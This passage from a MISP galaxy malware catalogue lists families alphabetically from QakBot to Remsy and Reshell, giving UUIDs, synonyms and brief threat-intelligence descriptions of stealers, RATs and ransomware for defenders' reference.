UUID 080b2071-2d69-4b76-962e-3d0142074bcb which can be used as unique global reference for Qadars in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QakBot

QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QakBot.

Known Synonyms
`Oakboat`
`Pinkslipbot`
`Qbot`
`Quakbot`

Internal MISP references

UUID 2ccaccd0-8362-4224-8497-2012e7cc7549 which can be used as unique global reference for QakBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QHost

According to F-Secure, this is a network worm with backdoor capabilities, which spreads itself under Win32 systems. The worm was reported in-the-wild in July-August, 2000. The worm itself is a Win32 executable file and about 120K long, written in MS Visual C++.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QHost.

Known Synonyms
`Tolouge`

Internal MISP references

UUID 28f35535-dd40-4ee2-8064-5acbe76d8d4c which can be used as unique global reference for QHost in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost - webarchive

Associated metadata

Metadata key	Value
type	[]

QtBot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QtBot.

Known Synonyms
`qtproject`

Internal MISP references

UUID e8240391-3e3d-4894-ba80-f8e8de8a8222 which can be used as unique global reference for QtBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QuantLoader

Internal MISP references

UUID e6005ce5-3e3d-4dfb-8de7-3da45e89e549 which can be used as unique global reference for QuantLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QUARTERRIG

A stager used by APT29 to download and run CobaltStrike. Here, MUSKYBEAT refers to the in-memory dropper component, while STATICNOISE is the final payload / downloader.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QUARTERRIG.

Known Synonyms
`MUSKYBEAT`
`STATICNOISE`

Internal MISP references

UUID ef29604c-1fc8-4f3f-9342-dbb28bb1bd5b which can be used as unique global reference for QUARTERRIG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Quasar RAT

Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Quasar RAT.

Known Synonyms
`CinaRAT`
`QuasarRAT`
`Yggdrasil`

Internal MISP references

UUID 05252643-093b-4070-b62f-d5836683a9fa which can be used as unique global reference for Quasar RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QuickHeal

Internal MISP references

UUID 8a4747a4-8165-40eb-abfe-fd674558ecb4 which can be used as unique global reference for QuickHeal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QUICKMUTE

QuickMute is a malware developed using the C/C++ programming language. Functionally provides download, RC4 decryption, and in-memory launch of the payload (waiting for a PE file with the export function "HttpsVictimMain"). To communicate with the management server, a number of protocols are provided, in particular: TCP, UDP, HTTP, HTTPS.

Internal MISP references

UUID 56d5ee92-845e-4b71-814c-2b0f0ca88523 which can be used as unique global reference for QUICKMUTE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QUIETCANARY

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QUIETCANARY.

Known Synonyms
`Kapushka`
`Tunnus`

Internal MISP references

UUID 2577fb8d-1511-49f7-9b62-7816137190c8 which can be used as unique global reference for QUIETCANARY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QuietSieve

According to Microsoft, this is a heavily obfuscated .NET malware, primarily geared towards the exfiltration of data from the compromised host. But it can also receive and execute a remote payload from the operator.

Internal MISP references

UUID 49aa0a57-812c-4344-9315-cd8c3220198e which can be used as unique global reference for QuietSieve in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QuiteRAT

QuiteRAT is a simple remote access trojan written with the help of Qt libraries.

After sending preliminary system information to its C&C server, it expects a response containing either a supported command code or an actual Windows command (like systeminfo or ipconfig with parameters) to execute.

It was deployed in a campaign exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QuiteRAT.

Known Synonyms
`Acres`

Internal MISP references

UUID 03409fbe-c8ac-41f9-a89b-38dd9f7ef63d which can be used as unique global reference for QuiteRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Qulab

Qulab is an AutoIT Malware focusing on stealing & clipping content from victim's machines.

Internal MISP references

UUID 728ce877-6f1d-4719-81df-387a8e395695 which can be used as unique global reference for Qulab in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QvoidStealer

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QvoidStealer.

Known Synonyms
`Qvoid-Token-Grabber`

Internal MISP references

UUID 020950da-79e5-481b-9986-14ed1c97e04c which can be used as unique global reference for QvoidStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

r77

According to the author, r77 is a ring 3 rootkit that hides everything: * Files, directories * Processes & CPU usage * Registry keys & values * Services * TCP & UDP connections * Junctions, named pipes, scheduled tasks

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular r77.

Known Synonyms
`r77 Rootkit`

Internal MISP references

UUID f577050b-a4a3-4ebd-a9d9-77300f3435f5 which can be used as unique global reference for r77 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

r980

Internal MISP references

UUID 06f63e6b-d177-4e21-b432-e3a219bc0965 which can be used as unique global reference for r980 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Raccoon

Raccoon Stealer is a malware reportedly sold for $75 a week or $200 a month. It gathers personal information including passwords, browser cookies and autofill data, as well as cryptowallet details. Additionally, Raccoon Stealer records system information such as IP addresses and geo-location data.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Raccoon.

Known Synonyms
`Mohazo`
`RaccoonStealer`
`Racealer`
`Racoon`

Internal MISP references

UUID 027fb7d0-3e9b-4433-aee1-c266e165a5cc which can be used as unique global reference for Raccoon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Racket Downloader

Racket Downloader is an HTTP(S) downloader.

It uses a custom substitution cipher for decryption of its character strings, and RC5 with a 256-bit key for encryption and decryption of network traffic.

It sends an HTTP POST request containing a particular value that inspired its name, like "?product_field=racket" or "prd_fld=racket".

Racket Downloader was deployed against South Korean targets running the Initech INISAFE CrossWeb EX software in Q2 2021 and Q1 2022.

Internal MISP references

UUID 993db92e-0c84-4750-a58f-2b61d6cd6d67 which can be used as unique global reference for Racket Downloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rad

Internal MISP references

UUID f99e0c8b-a479-4902-9c7e-e16724323ef6 which can be used as unique global reference for Rad in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Radamant

Internal MISP references

UUID 98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c which can be used as unique global reference for Radamant in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant - webarchive

Associated metadata

Metadata key	Value
type	[]

RadRAT

Internal MISP references

UUID 271752e3-67ca-48bc-ade2-30eec11defca which can be used as unique global reference for RadRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RagnarLocker (Windows)

Internal MISP references

UUID 33f55172-873b-409e-a09b-97ac1301b036 which can be used as unique global reference for RagnarLocker (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ragnarok

According to Bleeping Computer, the ransomware is used in targeted attacks against unpatched Citrix servers. It excludes Russian and Chinese targets using the system's Language ID for filtering. It also tries to disable Windows Defender and has a number of UNIX filepath references in its strings. Encryption method is AES using a dynamically generated key, then bundling this key up via RSA.

Internal MISP references

UUID ce9dffb7-2220-4e9c-9cb1-221195ba42ba which can be used as unique global reference for Ragnarok in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Raindrop

Raindrop is a loader for Cobalt Strike that was observed in the SolarWinds attack.

Internal MISP references

UUID 309f9be7-8824-4452-90b3-cef81fd10099 which can be used as unique global reference for Raindrop in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rakhni

Internal MISP references

UUID cf6887d9-3d68-4f89-9d61-e97dcc4d8c20 which can be used as unique global reference for Rakhni in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rambo

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rambo.

Known Synonyms
`brebsd`

Internal MISP references

UUID 805b99d1-233d-4f7f-b343-440e5d507494 which can be used as unique global reference for Rambo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ramdo

Internal MISP references

UUID 51f53823-d289-4176-af45-3fca7eda824b which can be used as unique global reference for Ramdo in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo - webarchive

Associated metadata

Metadata key	Value
type	[]

Ramnit

According to Check Point, Ramnit is primarily a banking trojan, meaning that its purpose is to steal login credentials for online banking, which cybercriminals can sell or use in future attacks. For this reason, Ramnit primarily targets individuals rather than focusing on particular industries.

Ramnit campaigns have been observed to target organizations in particular industries. For example, a 2019 campaign targeted financial organizations in the United Kingdom, Italy, and Canada.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ramnit.

Known Synonyms
`Nimnul`

Internal MISP references

UUID 542161c0-47a4-4297-baca-5ed98386d228 which can be used as unique global reference for Ramnit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ramsay

Internal MISP references

UUID 3b5bb37b-c5be-45b6-a4b1-83a03605a926 which can be used as unique global reference for Ramsay in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ranbyus

Internal MISP references

UUID 5d9a27e7-3110-470a-ac0d-2bf00cac7846 which can be used as unique global reference for Ranbyus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ranion

Ransomware.

Internal MISP references

UUID 2ae8b99c-cebe-4758-8ae9-8f336a7bef0d which can be used as unique global reference for Ranion in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ranscam

Internal MISP references

UUID 50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b which can be used as unique global reference for Ranscam in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ransoc

Internal MISP references

UUID 5310903e-0704-4ca4-ab1b-52d243dddb06 which can be used as unique global reference for Ransoc in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RansomEXX (Windows)

RansomExx is a ransomware family that targeted multiple companies starting in mid-2020. It shares commonalities with Defray777.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RansomEXX (Windows).

Known Synonyms
`Defray777`
`Ransom X`

Internal MISP references

UUID ddb31693-2356-4345-9c0f-ab37724090a4 which can be used as unique global reference for RansomEXX (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RansomHub

Ransomware written in Golang and obfuscated with Gobfuscate, with significant code overlap to Knight ransomware.

Internal MISP references

UUID 5cd36ca4-ddf9-4abf-a7e4-b54a5d02c62a which can be used as unique global reference for RansomHub in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ransomlock

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ransomlock.

Known Synonyms
`WinLock`

Internal MISP references

UUID 3e47c926-eea3-4fba-915a-1f3c5b92a94c which can be used as unique global reference for Ransomlock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SNC

Ransomware SNC is a ransomware who encrypts files and asks for a variable amount of Bitcoin before releasing the decryption key to your files. The threat actor asks to be contacted for negotiating the right ransom fee.

Internal MISP references

UUID 0e9c2936-7167-48fb-9dee-a83f83d8e41e which can be used as unique global reference for SNC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rapid Ransom

InfinityGroup notes that Rapid Ransomware, unlike regular Ransomware, stays active on the computer after initially encrypting the systems and also encrypts any new files that are created. It does this by creating auto-runs that are designed to launch the ransomware and display the ransom note every time the infected system is started.

Internal MISP references

UUID 06929ad3-2a00-4212-b171-9ecb5f956af5 which can be used as unique global reference for Rapid Ransom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RapidStealer

A spy trojan is a type of malware that has the capability to gather information from the infected system without consent from the user. This information is then sent to a remote attacker.

Internal MISP references

UUID bc1fc21d-80c0-4629-bb18-d5ae1df2a431 which can be used as unique global reference for RapidStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rarog

Internal MISP references

UUID 184e5134-473c-4a01-9a8b-f4776f178fc9 which can be used as unique global reference for Rarog in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

rarstar

This ransomware encrypts all user’s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.

Internal MISP references

UUID e0a1407f-2595-4bd2-ba16-2c6d9be4e066 which can be used as unique global reference for rarstar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Raspberry Robin

Worm spread by external drives that leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Raspberry Robin.

Known Synonyms
`LINK_MSIEXEC`
`QNAP-Worm`
`RaspberryRobin`

Internal MISP references

UUID 34b3a45b-e522-4342-91c8-b6aad9817f99 which can be used as unique global reference for Raspberry Robin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ratankba

This is a backdoor that establishes persistence using the Startup folder. It communicates to its C&C server using HTTPS and a static HTTP User-Agent string. QUICKRIDE is capable of gathering information about the system, downloading and loading executables, and uninstalling itself. It was leveraged against banks in Poland.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ratankba.

Known Synonyms
`QUICKRIDE`

Internal MISP references

UUID eead20f5-6a30-4700-8d14-cfb2d42eaff0 which can be used as unique global reference for Ratankba in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RatankbaPOS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RatankbaPOS.

Known Synonyms
`RATANKBAPOS`

Internal MISP references

UUID 15b85bac-c58b-41fd-8332-cfac7c445e0d which can be used as unique global reference for RatankbaPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RATel

Internal MISP references

UUID 56ac6980-4db4-4bac-8f8a-cebf5ead6308 which can be used as unique global reference for RATel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RatSnif

Internal MISP references

UUID 2f700b52-4379-4b53-894b-1823e34ae71d which can be used as unique global reference for RatSnif in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RAWDOOR

Internal MISP references

UUID 4dd64925-a899-42ed-ae79-49030cd6d419 which can be used as unique global reference for RAWDOOR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RawPOS

Internal MISP references

UUID 80f87001-ff40-4e33-bd12-12ed1a92d1d7 which can be used as unique global reference for RawPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Razy

Razy is a malware family which uses a malicious browser extension in order to steal cryptocurrency.

Internal MISP references

UUID 6293085e-55c7-4026-8c98-1fa489692d4e which can be used as unique global reference for Razy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RC2FM

A family identified by ESET Research in the InvisiMole campaign.

Internal MISP references

UUID 165f385f-8507-4cd3-9afd-911a016b2d29 which can be used as unique global reference for RC2FM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RCS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RCS.

Known Synonyms
`Crisis`
`Remote Control System`

Internal MISP references

UUID c359c74e-4155-4e66-a344-b56947f75119 which can be used as unique global reference for RCS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RCtrl

Internal MISP references

UUID 40eff712-4812-4b8a-872d-7c9f4b7a8d72 which can be used as unique global reference for RCtrl in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

rdasrv

Internal MISP references

UUID 1bf3469a-b9c8-497a-bcbb-b1095386706a which can be used as unique global reference for rdasrv in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RDAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RDAT.

Known Synonyms
`GREYSTUFF`

Internal MISP references

UUID 69798a1e-1caf-4bc8-b4af-6508d8a26717 which can be used as unique global reference for RDAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ReactorBot

Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.

Internal MISP references

UUID 9d58d94f-6885-4a38-b086-b9978ac62c1f which can be used as unique global reference for ReactorBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Reaver

Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the "Five Poisons" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.

Internal MISP references

UUID 826c31ca-2617-47e4-b236-205da3881182 which can be used as unique global reference for Reaver in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RecordBreaker

This malware is a successor to Raccoon Stealer (also referred to as Raccoon Stealer 2.0), which is however a full rewrite in C/C++.

Internal MISP references

UUID 812fbee2-6f12-4dca-a205-d317fb9065bb which can be used as unique global reference for RecordBreaker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedAlpha

Internal MISP references

UUID 6be9eee4-ee99-4ad6-bee3-2365d7b37a88 which can be used as unique global reference for RedAlpha in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedCap

According to Trend Micro, this backdoor receives valid domain credentials as an argument and uses it to log on to the Exchange Server and use it for data exfiltration purposes. The main function of this stage is to take the stolen password from the argument and send it to the attackers as an attachment in an email. We also observed that the threat actors relay these emails via government Exchange Servers using vaild accounts with stolen passwords.

Internal MISP references

UUID c1ba2ad1-70d9-4833-ac15-18fb8d0a2408 which can be used as unique global reference for RedCap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedCurl

Internal MISP references

UUID 913d3007-9c2b-4c1c-b3a6-2ecb736bc338 which can be used as unique global reference for RedCurl in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedEnergy Stealer

According to Zscaler ThreatLabz, RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.The name of the malware was kept due to the common method names observed during the analysis.

Internal MISP references

UUID b5cbe5c8-8cda-43af-bd67-99dcbd9e0dbf which can be used as unique global reference for RedEnergy Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedLeaves

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedLeaves.

Known Synonyms
`BUGJUICE`

Internal MISP references

UUID a70e93a7-3578-47e1-9926-0818979ed866 which can be used as unique global reference for RedLeaves in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedLine Stealer

RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedLine Stealer.

Known Synonyms
`RECORDSTEALER`

Internal MISP references

UUID ff18a858-7778-485c-949b-d28d867d1ffb which can be used as unique global reference for RedLine Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Redosdru

Internal MISP references

UUID eb7a5417-ebbe-42c9-834b-2412a7e338f1 which can be used as unique global reference for Redosdru in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

REDPEPPER

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular REDPEPPER.

Known Synonyms
`Adupib`

Internal MISP references

UUID 42fc1cf4-23ee-47a6-bdd3-7dc824948ba7 which can be used as unique global reference for REDPEPPER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedRum

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedRum.

Known Synonyms
`Grinch`
`Thanos`
`Tycoon`

Internal MISP references

UUID cbb4cfd8-3642-4b04-a199-8e9b4b80fb62 which can be used as unique global reference for RedRum in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

REDSALT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular REDSALT.

Known Synonyms
`Dipsind`

Internal MISP references

UUID da2210c7-c953-4367-9f4b-778e77af7ce7 which can be used as unique global reference for REDSALT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

REDSHAWL

REDSHAWL is a session hijacking utility that starts a new process as another user currently logged on to the same system via command-line.

Internal MISP references

UUID 799cce43-6ba0-4e21-9a63-f8b7f9bb7cc4 which can be used as unique global reference for REDSHAWL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Redyms

Internal MISP references

UUID 36893c2a-28ad-4dd3-a66b-906f1dd15b92 which can be used as unique global reference for Redyms in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Red Alert

Internal MISP references

UUID cd5f5165-7bd3-4430-b0bc-2c8fa518f618 which can be used as unique global reference for Red Alert in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Red Gambler

Internal MISP references

UUID ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7 which can be used as unique global reference for Red Gambler in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

reGeorg

Internal MISP references

UUID 9ee0eb87-7648-4581-b301-7472a48946ad which can be used as unique global reference for reGeorg in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Regin

Regin is a sophisticated malware and hacking toolkit attributed to United States' National Security Agency (NSA) for government spying operations. It was first publicly revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. Regin malware targeted victims in a range of industries, telecom, government, and financial institutions. It was engineered to be modular and over time dozens of modules have been found and attributed to this family. Symantec observed around 100 infections in 10 different countries across a variety of organisations including private companies, government entities, and research institutes.

Internal MISP references

UUID 4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb which can be used as unique global reference for Regin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RegretLocker

According to PCrisk, RegretLocker is malicious software classified as ransomware. Systems infected with this malware have their data encrypted and users receive ransom demands for decryption. During the encryption process, all affected files are appended with the ".mouse" extension.

Internal MISP references

UUID f89df0d5-2d01-49a2-a2d0-71cdc6a9d64e which can be used as unique global reference for RegretLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RekenSom

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RekenSom.

Known Synonyms
`GHack Ransomware`

Internal MISP references

UUID b59a97df-04c5-4e54-a7aa-92452baa7240 which can be used as unique global reference for RekenSom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

win.rekoobe

A Trojan for Winows with the same code structure and functionalities of elf.rekoobe, for Linux environment instead.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular win.rekoobe.

Known Synonyms
`tinyshell.win`
`tshd.win`

Internal MISP references

UUID e928d9ca-237f-48ab-ab4c-65c04baeb863 which can be used as unique global reference for win.rekoobe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rekt Loader

Internal MISP references

UUID 431808a0-3671-4072-a9af-9947a54b4b9d which can be used as unique global reference for Rekt Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rektware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rektware.

Known Synonyms
`PRZT Ransomware`

Internal MISP references

UUID b40a66c6-c8fa-43c3-8084-87e90f00a8f1 which can be used as unique global reference for Rektware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RelicRace

Internal MISP references

UUID 9bc81527-97fe-4dd6-87e6-d8ae75e58818 which can be used as unique global reference for RelicRace in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RemCom

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RemCom.

Known Synonyms
`RemoteCommandExecution`

Internal MISP references

UUID 135ce3db-a242-4f81-844a-cf03eb72c291 which can be used as unique global reference for RemCom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Remcos

Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.

Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Remcos.

Known Synonyms
`RemcosRAT`
`Remvio`
`Socmer`

Internal MISP references

UUID 2894aee2-e0ec-417a-811e-74a68ab967b2 which can be used as unique global reference for Remcos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Remexi

Remexi is a highly advanced and stealthy malware discovered in recent times. It employs sophisticated evasion techniques to infiltrate target systems and networks undetected. This malware utilizes various propagation vectors, including exploit kits, social engineering tactics, and compromised websites. Once inside a system, Remexi establishes persistence through rootkit capabilities and leverages coAmmand-and-control infrastructure to receive and execute malicious commands. It possesses keylogging and data exfiltration capabilities, enabling it to steal sensitive information such as login credentials and financial data. Additionally, Remexi can download and execute additional payloads, making it adaptable and capable of evolving its malicious activities over time.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Remexi.

Known Synonyms
`CACHEMONEY`

Internal MISP references

UUID d39486af-c056-4bbf-aa1d-86fb5ef90ada which can be used as unique global reference for Remexi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RemoteAdmin

Internal MISP references

UUID 6730a859-f2b9-48f9-8d2b-22944a79c072 which can be used as unique global reference for RemoteAdmin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RemoteControl

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RemoteControl.

Known Synonyms
`remotecontrolclient`

Internal MISP references

UUID 44aae79d-c2f5-47f6-99c1-540c0c5420db which can be used as unique global reference for RemoteControl in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Remsec

Internal MISP references

UUID 6a3c3fbc-97ec-4938-b64e-2679e4b73db9 which can be used as unique global reference for Remsec in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Remy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Remy.

Known Synonyms
`WINDSHIELD`

Internal MISP references

UUID b2b93651-cf64-47f5-a54f-799b919c592c which can be used as unique global reference for Remy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rerdom

Internal MISP references

UUID a1f137d4-298f-4761-935d-bd39ab898479 which can be used as unique global reference for Rerdom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Reshell

Internal MISP references

UUID 37333fe3-0b6a-4b3b-9f2f-90d29ee5419a which can be used as unique global reference for Reshell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Resident

